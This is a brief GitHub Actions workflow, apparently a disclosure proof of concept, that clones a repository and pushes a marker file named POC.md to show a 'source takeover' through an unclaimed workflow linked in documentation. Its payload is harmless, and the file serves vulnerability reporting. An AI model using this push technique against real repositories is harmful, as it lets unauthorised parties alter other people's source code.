name: Source Takeover PoC
on: workflow_dispatch

permissions:
  contents: write   # Needed to push to the victim repo
  pull-requests: write

jobs:
  takeover:
    runs-on: ubuntu-latest
    steps:
      - name: Clone target repository
        run: |
          git clone "https://github.com/${{ github.repository }}" target
          cd target
          git config user.email "poc-attacker@example.com"
          git config user.name "RCE PoC Bot"

          echo "# Proof of RCE" > POC.md
          echo "This file was added by running a workflow linked in your documentation." >> POC.md

          git add POC.md
          git commit -m "PoC: Added harmless proof file via unclaimed workflow"
          git push origin HEAD
